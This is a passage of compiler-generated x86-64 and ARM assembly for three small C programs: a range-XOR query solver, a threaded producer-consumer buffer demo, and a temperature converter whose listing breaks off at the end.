.file "998872.c" .intel_syntax noprefix .text .section .rodata .LC0: .string "%d%d" .LC1: .string "%d" .LC2: .string "%d\n" .text .globl main .type main, @function main: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 lea r11, -118784[rsp] .LPSRL0: sub rsp, 4096 or DWORD PTR [rsp], 0 cmp rsp, r11 jne .LPSRL0 sub rsp, 1408 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax lea rax, -120144[rbp] mov edx, 40040 mov esi, 0 mov rdi, rax call memset@PLT lea rax, -80096[rbp] mov edx, 40040 mov esi, 0 mov rdi, rax call memset@PLT lea rax, -40048[rbp] mov edx, 40040 mov esi, 0 mov rdi, rax call memset@PLT lea rdx, -120180[rbp] lea rax, -120184[rbp] mov rsi, rax lea rdi, .LC0[rip] mov eax, 0 call __isoc99_scanf@PLT mov DWORD PTR -120176[rbp], 0 jmp .L2 .L3: lea rdx, -120144[rbp] mov eax, DWORD PTR -120176[rbp] cdqe sal rax, 2 add rax, rdx mov rsi, rax lea rdi, .LC1[rip] mov eax, 0 call __isoc99_scanf@PLT add DWORD PTR -120176[rbp], 1 .L2: mov eax, DWORD PTR -120184[rbp] cmp DWORD PTR -120176[rbp], eax jl .L3 mov DWORD PTR -120176[rbp], 1 jmp .L4 .L15: lea rdx, -40048[rbp] mov eax, DWORD PTR -120176[rbp] cdqe sal rax, 2 add rdx, rax lea rcx, -80096[rbp] mov eax, DWORD PTR -120176[rbp] cdqe sal rax, 2 add rax, rcx mov rsi, rax lea rdi, .LC0[rip] mov eax, 0 call __isoc99_scanf@PLT mov DWORD PTR -120164[rbp], 0 mov DWORD PTR -120160[rbp], 1 mov eax, DWORD PTR -120176[rbp] cdqe mov eax, DWORD PTR -80096[rbp+rax*4] mov DWORD PTR -120172[rbp], eax jmp .L5 .L6: mov eax, DWORD PTR -120172[rbp] cdqe mov eax, DWORD PTR -120144[rbp+rax*4] mov ecx, DWORD PTR -120184[rbp] cdq idiv ecx mov DWORD PTR -120148[rbp], edx mov eax, DWORD PTR -120148[rbp] add DWORD PTR -120164[rbp], eax add DWORD PTR -120172[rbp], 1 .L5: mov eax, DWORD PTR -120176[rbp] cdqe mov eax, DWORD PTR -40048[rbp+rax*4] cmp DWORD PTR -120172[rbp], eax jle .L6 mov eax, DWORD PTR -120176[rbp] cdqe mov eax, DWORD PTR -80096[rbp+rax*4] mov DWORD PTR -120172[rbp], eax jmp .L7 .L8: mov eax, DWORD PTR -120172[rbp] cdqe mov eax, DWORD PTR -120144[rbp+rax*4] mov ecx, DWORD PTR -120184[rbp] cdq idiv ecx mov DWORD PTR -120148[rbp], edx mov eax, DWORD PTR -120160[rbp] imul eax, DWORD PTR -120148[rbp] mov DWORD PTR -120160[rbp], eax mov ecx, DWORD PTR -120184[rbp] mov eax, DWORD PTR -120160[rbp] cdq idiv ecx mov DWORD PTR -120160[rbp], edx add DWORD PTR -120172[rbp], 1 .L7: mov eax, DWORD PTR -120176[rbp] cdqe mov eax, DWORD PTR -40048[rbp+rax*4] cmp DWORD PTR -120172[rbp], eax jle .L8 mov ecx, DWORD PTR -120184[rbp] mov eax, DWORD PTR -120164[rbp] cdq idiv ecx mov DWORD PTR -120156[rbp], edx mov ecx, DWORD PTR -120184[rbp] mov eax, DWORD PTR -120160[rbp] cdq idiv ecx mov DWORD PTR -120152[rbp], edx mov eax, DWORD PTR -120156[rbp] cmp eax, DWORD PTR -120152[rbp] jge .L9 mov eax, DWORD PTR -120156[rbp] cdqe mov eax, DWORD PTR -120144[rbp+rax*4] mov DWORD PTR -120168[rbp], eax mov eax, DWORD PTR -120156[rbp] add eax, 1 mov DWORD PTR -120172[rbp], eax jmp .L10 .L11: mov eax, DWORD PTR -120172[rbp] cdqe mov eax, DWORD PTR -120144[rbp+rax*4] xor DWORD PTR -120168[rbp], eax add DWORD PTR -120172[rbp], 1 .L10: mov eax, DWORD PTR -120172[rbp] cmp eax, DWORD PTR -120152[rbp] jle .L11 mov eax, DWORD PTR -120168[rbp] mov esi, eax lea rdi, .LC2[rip] mov eax, 0 call printf@PLT jmp .L12 .L9: mov eax, DWORD PTR -120152[rbp] cdqe mov eax, DWORD PTR -120144[rbp+rax*4] mov DWORD PTR -120168[rbp], eax mov eax, DWORD PTR -120152[rbp] add eax, 1 mov DWORD PTR -120172[rbp], eax jmp .L13 .L14: mov eax, DWORD PTR -120172[rbp] cdqe mov eax, DWORD PTR -120144[rbp+rax*4] xor DWORD PTR -120168[rbp], eax add DWORD PTR -120172[rbp], 1 .L13: mov eax, DWORD PTR -120172[rbp] cmp eax, DWORD PTR -120156[rbp] jle .L14 mov eax, DWORD PTR -120168[rbp] mov esi, eax lea rdi, .LC2[rip] mov eax, 0 call printf@PLT .L12: add DWORD PTR -120176[rbp], 1 .L4: mov eax, DWORD PTR -120180[rbp] cmp DWORD PTR -120176[rbp], eax jle .L15 mov eax, 0 mov rsi, QWORD PTR -8[rbp] sub rsi, QWORD PTR fs:40 je .L17 call __stack_chk_fail@PLT .L17: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "998872.c" .text .section .rodata .align 2 .LC0: .ascii "%d%d\000" .align 2 .LC1: .ascii "%d\000" .global __aeabi_idivmod .align 2 .LC2: .ascii "%d\012\000" .align 2 .LC3: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 120168 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, fp, lr} add fp, sp, #8 sub sp, sp, #119808 sub sp, sp, #364 ldr r3, .L18 ldr r3, [r3] str r3, [fp, #-16] mov r3,#0 sub r3, fp, #118784 sub r3, r3, #12 sub r3, r3, #1328 sub r3, r3, #12 ldr r2, .L18+4 mov r1, #0 mov r0, r3 bl memset sub r3, fp, #77824 sub r3, r3, #12 sub r3, r3, #2256 sub r3, r3, #4 ldr r2, .L18+4 mov r1, #0 mov r0, r3 bl memset sub r3, fp, #36864 sub r3, r3, #12 sub r3, r3, #3168 sub r3, r3, #12 ldr r2, .L18+4 mov r1, #0 mov r0, r3 bl memset sub r2, fp, #119808 sub r2, r2, #12 sub r2, r2, #352 sub r3, fp, #119808 sub r3, r3, #12 sub r3, r3, #356 mov r1, r3 ldr r0, .L18+8 bl __isoc99_scanf sub r3, fp, #118784 sub r3, r3, #12 mov r2, r3 mov r3, #0 str r3, [r2, #-1372] b .L2 .L3: sub r3, fp, #119808 sub r3, r3, #12 sub r3, r3, #316 sub r2, fp, #118784 sub r2, r2, #12 ldr r2, [r2, #-1372] lsl r2, r2, #2 add r3, r3, r2 mov r1, r3 ldr r0, .L18+12 bl __isoc99_scanf sub r3, fp, #118784 sub r3, r3, #12 mov r2, r3 sub r3, fp, #118784 sub r3, r3, #12 ldr r3, [r3, #-1372] add r3, r3, #1 str r3, [r2, #-1372] .L2: sub r3, fp, #118784 sub r3, r3, #12 ldr r3, [r3, #-1380] sub r2, fp, #118784 sub r2, r2, #12 ldr r2, [r2, #-1372] cmp r2, r3 blt .L3 sub r3, fp, #118784 sub r3, r3, #12 mov r2, r3 mov r3, #1 str r3, [r2, #-1372] b .L4 .L15: sub r3, fp, #79872 sub r3, r3, #12 sub r3, r3, #212 sub r2, fp, #118784 sub r2, r2, #12 ldr r2, [r2, #-1372] lsl r2, r2, #2 add r1, r3, r2 sub r3, fp, #39936 sub r3, r3, #12 sub r3, r3, #108 sub r2, fp, #118784 sub r2, r2, #12 ldr r2, [r2, #-1372] lsl r2, r2, #2 add r3, r3, r2 mov r2, r3 ldr r0, .L18+8 bl __isoc99_scanf sub r3, fp, #118784 sub r3, r3, #12 mov r2, r3 mov r3, #0 str r3, [r2, #-1360] sub r3, fp, #118784 sub r3, r3, #12 mov r2, r3 mov r3, #1 str r3, [r2, #-1356] sub r3, fp, #118784 sub r3, r3, #12 mov r2, r3 sub r3, fp, #77824 sub r3, r3, #12 mov r1, r3 sub r3, fp, #118784 sub r3, r3, #12 ldr r3, [r3, #-1372] lsl r3, r3, #2 add r3, r1, r3 ldr r3, [r3, #-2260] str r3, [r2, #-1368] b .L5 .L6: sub r3, fp, #118784 sub r3, r3, #12 mov r2, r3 sub r3, fp, #118784 sub r3, r3, #12 ldr r3, [r3, #-1368] lsl r3, r3, #2 add r3, r2, r3 ldr r3, [r3, #-1340] sub r2, fp, #118784 sub r2, r2, #12 ldr r2, [r2, #-1380] sub r1, fp, #118784 sub r1, r1, #12 mov r4, r1 mov r1, r2 mov r0, r3 bl __aeabi_idivmod mov r3, r1 str r3, [r4, #-1344] sub r3, fp, #118784 sub r3, r3, #12 mov r1, r3 sub r3, fp, #118784 sub r3, r3, #12 mov r2, r3 sub r3, fp, #118784 sub r3, r3, #12 ldr r2, [r2, #-1360] ldr r3, [r3, #-1344] add r3, r2, r3 str r3, [r1, #-1360] sub r3, fp, #118784 sub r3, r3, #12 mov r2, r3 sub r3, fp, #118784 sub r3, r3, #12 ldr r3, [r3, #-1368] add r3, r3, #1 str r3, [r2, #-1368] .L5: sub r3, fp, #36864 sub r3, r3, #12 mov r2, r3 sub r3, fp, #118784 sub r3, r3, #12 ldr r3, [r3, #-1372] lsl r3, r3, #2 add r3, r2, r3 ldr r3, [r3, #-3180] sub r2, fp, #118784 sub r2, r2, #12 ldr r2, [r2, #-1368] cmp r2, r3 ble .L6 sub r3, fp, #118784 sub r3, r3, #12 mov r2, r3 sub r3, fp, #77824 sub r3, r3, #12 mov r1, r3 sub r3, fp, #118784 sub r3, r3, #12 ldr r3, [r3, #-1372] lsl r3, r3, #2 add r3, r1, r3 ldr r3, [r3, #-2260] str r3, [r2, #-1368] b .L7 .L8: sub r3, fp, #118784 sub r3, r3, #12 mov r2, r3 sub r3, fp, #118784 sub r3, r3, #12 ldr r3, [r3, #-1368] lsl r3, r3, #2 add r3, r2, r3 ldr r3, [r3, #-1340] sub r2, fp, #118784 sub r2, r2, #12 ldr r2, [r2, #-1380] sub r1, fp, #118784 sub r1, r1, #12 mov r4, r1 mov r1, r2 mov r0, r3 bl __aeabi_idivmod mov r3, r1 str r3, [r4, #-1344] sub r3, fp, #118784 sub r3, r3, #12 mov r1, r3 sub r3, fp, #118784 sub r3, r3, #12 sub r2, fp, #118784 sub r2, r2, #12 ldr r3, [r3, #-1356] ldr r2, [r2, #-1344] mul r3, r2, r3 str r3, [r1, #-1356] sub r3, fp, #118784 sub r3, r3, #12 ldr r2, [r3, #-1380] sub r3, fp, #118784 sub r3, r3, #12 mov r4, r3 sub r3, fp, #118784 sub r3, r3, #12 ldr r3, [r3, #-1356] mov r1, r2 mov r0, r3 bl __aeabi_idivmod mov r3, r1 str r3, [r4, #-1356] sub r3, fp, #118784 sub r3, r3, #12 mov r2, r3 sub r3, fp, #118784 sub r3, r3, #12 ldr r3, [r3, #-1368] add r3, r3, #1 str r3, [r2, #-1368] .L7: sub r3, fp, #36864 sub r3, r3, #12 mov r2, r3 sub r3, fp, #118784 sub r3, r3, #12 ldr r3, [r3, #-1372] lsl r3, r3, #2 add r3, r2, r3 ldr r3, [r3, #-3180] sub r2, fp, #118784 sub r2, r2, #12 ldr r2, [r2, #-1368] cmp r2, r3 ble .L8 sub r3, fp, #118784 sub r3, r3, #12 ldr r2, [r3, #-1380] sub r3, fp, #118784 sub r3, r3, #12 mov r4, r3 sub r3, fp, #118784 sub r3, r3, #12 ldr r3, [r3, #-1360] mov r1, r2 mov r0, r3 bl __aeabi_idivmod mov r3, r1 str r3, [r4, #-1352] sub r3, fp, #118784 sub r3, r3, #12 ldr r2, [r3, #-1380] sub r3, fp, #118784 sub r3, r3, #12 mov r4, r3 sub r3, fp, #118784 sub r3, r3, #12 ldr r3, [r3, #-1356] mov r1, r2 mov r0, r3 bl __aeabi_idivmod mov r3, r1 str r3, [r4, #-1348] sub r3, fp, #118784 sub r3, r3, #12 mov r2, r3 sub r3, fp, #118784 sub r3, r3, #12 ldr r2, [r2, #-1352] ldr r3, [r3, #-1348] cmp r2, r3 bge .L9 sub r3, fp, #118784 sub r3, r3, #12 mov r2, r3 sub r3, fp, #118784 sub r3, r3, #12 mov r1, r3 sub r3, fp, #118784 sub r3, r3, #12 ldr r3, [r3, #-1352] lsl r3, r3, #2 add r3, r1, r3 ldr r3, [r3, #-1340] str r3, [r2, #-1364] sub r3, fp, #118784 sub r3, r3, #12 mov r2, r3 sub r3, fp, #118784 sub r3, r3, #12 ldr r3, [r3, #-1352] add r3, r3, #1 str r3, [r2, #-1368] b .L10 .L11: sub r3, fp, #118784 sub r3, r3, #12 mov r2, r3 sub r3, fp, #118784 sub r3, r3, #12 ldr r3, [r3, #-1368] lsl r3, r3, #2 add r3, r2, r3 ldr r3, [r3, #-1340] sub r2, fp, #118784 sub r2, r2, #12 mov r1, r2 sub r2, fp, #118784 sub r2, r2, #12 ldr r2, [r2, #-1364] eor r3, r3, r2 str r3, [r1, #-1364] sub r3, fp, #118784 sub r3, r3, #12 mov r2, r3 sub r3, fp, #118784 sub r3, r3, #12 ldr r3, [r3, #-1368] add r3, r3, #1 str r3, [r2, #-1368] .L10: sub r3, fp, #118784 sub r3, r3, #12 mov r2, r3 sub r3, fp, #118784 sub r3, r3, #12 ldr r2, [r2, #-1368] ldr r3, [r3, #-1348] cmp r2, r3 ble .L11 sub r3, fp, #118784 sub r3, r3, #12 ldr r1, [r3, #-1364] ldr r0, .L18+16 bl printf b .L12 .L9: sub r3, fp, #118784 sub r3, r3, #12 mov r2, r3 sub r3, fp, #118784 sub r3, r3, #12 mov r1, r3 sub r3, fp, #118784 sub r3, r3, #12 ldr r3, [r3, #-1348] lsl r3, r3, #2 add r3, r1, r3 ldr r3, [r3, #-1340] str r3, [r2, #-1364] sub r3, fp, #118784 sub r3, r3, #12 mov r2, r3 sub r3, fp, #118784 sub r3, r3, #12 ldr r3, [r3, #-1348] add r3, r3, #1 str r3, [r2, #-1368] b .L13 .L14: sub r3, fp, #118784 sub r3, r3, #12 mov r2, r3 sub r3, fp, #118784 sub r3, r3, #12 ldr r3, [r3, #-1368] lsl r3, r3, #2 add r3, r2, r3 ldr r3, [r3, #-1340] sub r2, fp, #118784 sub r2, r2, #12 mov r1, r2 sub r2, fp, #118784 sub r2, r2, #12 ldr r2, [r2, #-1364] eor r3, r3, r2 str r3, [r1, #-1364] sub r3, fp, #118784 sub r3, r3, #12 mov r2, r3 sub r3, fp, #118784 sub r3, r3, #12 ldr r3, [r3, #-1368] add r3, r3, #1 str r3, [r2, #-1368] .L13: sub r3, fp, #118784 sub r3, r3, #12 mov r2, r3 sub r3, fp, #118784 sub r3, r3, #12 ldr r2, [r2, #-1368] ldr r3, [r3, #-1352] cmp r2, r3 ble .L14 sub r3, fp, #118784 sub r3, r3, #12 ldr r1, [r3, #-1364] ldr r0, .L18+16 bl printf .L12: sub r3, fp, #118784 sub r3, r3, #12 mov r2, r3 sub r3, fp, #118784 sub r3, r3, #12 ldr r3, [r3, #-1372] add r3, r3, #1 str r3, [r2, #-1372] .L4: sub r3, fp, #118784 sub r3, r3, #12 ldr r3, [r3, #-1376] sub r2, fp, #118784 sub r2, r2, #12 ldr r2, [r2, #-1372] cmp r2, r3 ble .L15 mov r3, #0 ldr r2, .L18 ldr r1, [r2] ldr r2, [fp, #-16] eors r1, r2, r1 mov r2, #0 beq .L17 bl __stack_chk_fail .L17: mov r0, r3 sub sp, fp, #8 @ sp needed pop {r4, fp, pc} .L19: .align 2 .L18: .word .LC3 .word 40040 .word .LC0 .word .LC1 .word .LC2 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "142953.c" .intel_syntax noprefix .text .globl in .bss .align 4 .type in, @object .size in, 4 in: .zero 4 .globl out .align 4 .type out, @object .size out, 4 out: .zero 4 .globl buffer .align 16 .type buffer, @object .size buffer, 20 buffer: .zero 20 .globl flag .align 8 .type flag, @object .size flag, 8 flag: .zero 8 .globl turn .align 4 .type turn, @object .size turn, 4 turn: .zero 4 .section .rodata .align 8 .LC0: .string "Producer Insert Item %d at %d\n" .text .globl producer .type producer, @function producer: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov QWORD PTR -24[rbp], rdi mov DWORD PTR flag[rip], 1 mov DWORD PTR turn[rip], 1 nop .L3: mov eax, DWORD PTR flag[rip+4] cmp eax, 1 jne .L2 mov eax, DWORD PTR turn[rip] cmp eax, 1 je .L3 .L2: call rand@PLT movsx rdx, eax imul rdx, rdx, 680390859 shr rdx, 32 sar edx, 4 mov ecx, eax sar ecx, 31 sub edx, ecx mov DWORD PTR -4[rbp], edx mov edx, DWORD PTR -4[rbp] imul edx, edx, 101 sub eax, edx mov DWORD PTR -4[rbp], eax mov eax, DWORD PTR in[rip] cdqe lea rcx, 0[0+rax*4] lea rdx, buffer[rip] mov eax, DWORD PTR -4[rbp] mov DWORD PTR [rcx+rdx], eax mov edx, DWORD PTR in[rip] mov eax, DWORD PTR in[rip] cdqe lea rcx, 0[0+rax*4] lea rax, buffer[rip] mov eax, DWORD PTR [rcx+rax] mov esi, eax lea rdi, .LC0[rip] mov eax, 0 call printf@PLT mov eax, DWORD PTR in[rip] lea edx, 1[rax] movsx rax, edx imul rax, rax, 1717986919 shr rax, 32 sar eax mov ecx, edx sar ecx, 31 sub eax, ecx mov ecx, eax sal ecx, 2 add ecx, eax mov eax, edx sub eax, ecx mov DWORD PTR in[rip], eax mov DWORD PTR flag[rip], 0 nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size producer, .-producer .section .rodata .align 8 .LC1: .string "Consumer Remove Item %d from %d\n" .text .globl consumer .type consumer, @function consumer: .LFB7: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov QWORD PTR -24[rbp], rdi mov DWORD PTR flag[rip+4], 1 mov DWORD PTR turn[rip], 0 nop .L6: mov eax, DWORD PTR flag[rip] cmp eax, 1 jne .L5 mov eax, DWORD PTR turn[rip] test eax, eax je .L6 .L5: mov eax, DWORD PTR out[rip] cdqe lea rdx, 0[0+rax*4] lea rax, buffer[rip] mov eax, DWORD PTR [rdx+rax] mov DWORD PTR -4[rbp], eax mov edx, DWORD PTR out[rip] mov eax, DWORD PTR -4[rbp] mov esi, eax lea rdi, .LC1[rip] mov eax, 0 call printf@PLT mov eax, DWORD PTR out[rip] lea edx, 1[rax] movsx rax, edx imul rax, rax, 1717986919 shr rax, 32 sar eax mov ecx, edx sar ecx, 31 sub eax, ecx mov ecx, eax sal ecx, 2 add ecx, eax mov eax, edx sub eax, ecx mov DWORD PTR out[rip], eax mov DWORD PTR flag[rip+4], 0 nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE7: .size consumer, .-consumer .globl main .type main, @function main: .LFB8: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 112 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov edi, 0 call time@PLT mov edi, eax call srand@PLT mov DWORD PTR -104[rbp], 0 jmp .L8 .L9: lea rdx, -96[rbp] mov eax, DWORD PTR -104[rbp] cdqe sal rax, 3 add rax, rdx mov ecx, 0 lea rdx, producer[rip] mov esi, 0 mov rdi, rax call pthread_create@PLT lea rdx, -48[rbp] mov eax, DWORD PTR -104[rbp] cdqe sal rax, 3 add rax, rdx mov ecx, 0 lea rdx, consumer[rip] mov esi, 0 mov rdi, rax call pthread_create@PLT add DWORD PTR -104[rbp], 1 .L8: cmp DWORD PTR -104[rbp], 4 jle .L9 mov DWORD PTR -100[rbp], 0 jmp .L10 .L11: mov eax, DWORD PTR -100[rbp] cdqe mov rax, QWORD PTR -96[rbp+rax*8] mov esi, 0 mov rdi, rax call pthread_join@PLT mov eax, DWORD PTR -100[rbp] cdqe mov rax, QWORD PTR -48[rbp+rax*8] mov esi, 0 mov rdi, rax call pthread_join@PLT add DWORD PTR -100[rbp], 1 .L10: cmp DWORD PTR -100[rbp], 4 jle .L11 mov eax, 0 mov rcx, QWORD PTR -8[rbp] sub rcx, QWORD PTR fs:40 je .L13 call __stack_chk_fail@PLT .L13: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE8: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "142953.c" .text .global in .bss .align 2 .type in, %object .size in, 4 in: .space 4 .global out .align 2 .type out, %object .size out, 4 out: .space 4 .comm buffer,20,4 .global flag .align 2 .type flag, %object .size flag, 8 flag: .space 8 .comm turn,4,4 .section .rodata .align 2 .LC0: .ascii "Producer Insert Item %d at %d\012\000" .text .align 2 .global producer .syntax unified .arm .fpu softvfp .type producer, %function producer: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-16] ldr r3, .L4 mov r2, #1 str r2, [r3] ldr r3, .L4+4 mov r2, #1 str r2, [r3] nop .L3: ldr r3, .L4 ldr r3, [r3, #4] cmp r3, #1 bne .L2 ldr r3, .L4+4 ldr r3, [r3] cmp r3, #1 beq .L3 .L2: bl rand mov r2, r0 ldr r3, .L4+8 smull r1, r3, r2, r3 asr r1, r3, #4 asr r3, r2, #31 sub r1, r1, r3 mov r3, r1 lsl r3, r3, #2 add r3, r3, r1 lsl r0, r3, #2 add r3, r3, r0 lsl r3, r3, #2 add r3, r3, r1 sub r3, r2, r3 str r3, [fp, #-8] ldr r3, .L4+12 ldr r3, [r3] ldr r1, .L4+16 ldr r2, [fp, #-8] str r2, [r1, r3, lsl #2] ldr r3, .L4+12 ldr r3, [r3] ldr r2, .L4+16 ldr r3, [r2, r3, lsl #2] ldr r2, .L4+12 ldr r2, [r2] mov r1, r3 ldr r0, .L4+20 bl printf ldr r3, .L4+12 ldr r3, [r3] add r1, r3, #1 ldr r3, .L4+24 smull r2, r3, r1, r3 asr r2, r3, #1 asr r3, r1, #31 sub r2, r2, r3 mov r3, r2 lsl r3, r3, #2 add r3, r3, r2 sub r2, r1, r3 ldr r3, .L4+12 str r2, [r3] ldr r3, .L4 mov r2, #0 str r2, [r3] nop mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L5: .align 2 .L4: .word flag .word turn .word 680390859 .word in .word buffer .word .LC0 .word 1717986919 .size producer, .-producer .section .rodata .align 2 .LC1: .ascii "Consumer Remove Item %d from %d\012\000" .text .align 2 .global consumer .syntax unified .arm .fpu softvfp .type consumer, %function consumer: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-16] ldr r3, .L9 mov r2, #1 str r2, [r3, #4] ldr r3, .L9+4 mov r2, #0 str r2, [r3] nop .L8: ldr r3, .L9 ldr r3, [r3] cmp r3, #1 bne .L7 ldr r3, .L9+4 ldr r3, [r3] cmp r3, #0 beq .L8 .L7: ldr r3, .L9+8 ldr r3, [r3] ldr r2, .L9+12 ldr r3, [r2, r3, lsl #2] str r3, [fp, #-8] ldr r3, .L9+8 ldr r3, [r3] mov r2, r3 ldr r1, [fp, #-8] ldr r0, .L9+16 bl printf ldr r3, .L9+8 ldr r3, [r3] add r1, r3, #1 ldr r3, .L9+20 smull r2, r3, r1, r3 asr r2, r3, #1 asr r3, r1, #31 sub r2, r2, r3 mov r3, r2 lsl r3, r3, #2 add r3, r3, r2 sub r2, r1, r3 ldr r3, .L9+8 str r2, [r3] ldr r3, .L9 mov r2, #0 str r2, [r3, #4] nop mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L10: .align 2 .L9: .word flag .word turn .word out .word buffer .word .LC1 .word 1717986919 .size consumer, .-consumer .section .rodata .align 2 .LC2: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 56 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #56 ldr r3, .L18 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 mov r0, #0 bl time mov r3, r0 mov r0, r3 bl srand mov r3, #0 str r3, [fp, #-56] b .L12 .L13: sub r2, fp, #48 ldr r3, [fp, #-56] lsl r3, r3, #2 add r0, r2, r3 mov r3, #0 ldr r2, .L18+4 mov r1, #0 bl pthread_create sub r2, fp, #28 ldr r3, [fp, #-56] lsl r3, r3, #2 add r0, r2, r3 mov r3, #0 ldr r2, .L18+8 mov r1, #0 bl pthread_create ldr r3, [fp, #-56] add r3, r3, #1 str r3, [fp, #-56] .L12: ldr r3, [fp, #-56] cmp r3, #4 ble .L13 mov r3, #0 str r3, [fp, #-52] b .L14 .L15: ldr r3, [fp, #-52] lsl r3, r3, #2 sub r2, fp, #4 add r3, r2, r3 ldr r3, [r3, #-44] mov r1, #0 mov r0, r3 bl pthread_join ldr r3, [fp, #-52] lsl r3, r3, #2 sub r2, fp, #4 add r3, r2, r3 ldr r3, [r3, #-24] mov r1, #0 mov r0, r3 bl pthread_join ldr r3, [fp, #-52] add r3, r3, #1 str r3, [fp, #-52] .L14: ldr r3, [fp, #-52] cmp r3, #4 ble .L15 mov r3, #0 ldr r2, .L18 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L17 bl __stack_chk_fail .L17: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L19: .align 2 .L18: .word .LC2 .word producer .word consumer .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "465648.c" .intel_syntax noprefix .text .section .rodata .LC0: .string "\n\n1. F to C\n2. C to F" .LC1: .string "\n\nEnter your choice : " .LC2: .string "%d" .LC3: .string "\n\nEnter the value : " .LC4: .string "%f" .LC8: .string "\nInvalid Choice!\n\n" .LC9: .string "\nAnswer is %f\n\n" .text .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax lea rdi, .LC0[rip] mov eax, 0 call printf@PLT lea rdi, .LC1[rip] mov eax, 0 call printf@PLT lea rax, -20[rbp] mov rsi, rax lea rdi, .LC2[rip] mov eax, 0 call __isoc99_scanf@PLT mov eax, DWORD PTR -20[rbp] cmp eax, 1 jne .L2 lea rdi, .LC3[rip] mov eax, 0 call printf@PLT lea rax, -16[rbp] mov rsi, rax lea rdi, .LC4[rip] mov eax, 0 call __isoc99_scanf@PLT movss xmm0, DWORD PTR -16[rbp] movss xmm1, DWORD PTR .LC5[rip] subss xmm0, xmm1 cvtss2sd xmm0, xmm0 movsd xmm1, QWORD PTR .LC6[rip] divsd xmm0, xmm1 cvtsd2ss xmm0, xmm0 movss DWORD PTR -12[rbp], xmm0 jmp .L3 .L2: mov eax, DWORD PTR -20[rbp] cmp eax, 2 jne .L4 lea rdi, .LC3[rip] mov eax, 0 call printf@PLT lea rax, -16[rbp] mov rsi, rax lea rdi, .LC4[rip] mov eax, 0 call __isoc99_scanf@PLT movss xmm0, DWORD PTR -16[rbp] pxor xmm1, xmm1 cvtss2sd xmm1, xmm0 movsd xmm0, QWORD PTR .LC6[rip] mulsd xmm1, xmm0 movsd xmm0, QWORD PTR .LC7[rip] addsd xmm0, xmm1 cvtsd2ss xmm0, xmm0 movss DWORD PTR -12[rbp], xmm0 jmp .L3 .L4: lea rdi, .LC8[rip] mov eax, 0 call printf@PLT jmp .L6 .L3: pxor xmm2, xmm2 cvtss2sd xmm2, DWORD PTR -12[rbp] movq rax, xmm2 movq xmm0, rax lea rdi, .LC9[rip] mov eax, 1 call printf@PLT mov eax, 0 .L6: mov rdx, QWORD PTR -8[rbp] sub rdx, QWORD PTR fs:40 je .L7 call __stack_chk_fail@PLT .L7: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size main, .-main .section .rodata .align 4 .LC5: .long 1107296256 .align 8 .LC6: .long -858993459 .long 1073532108 .align 8 .LC7: .long 0 .long 1077936128 .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section 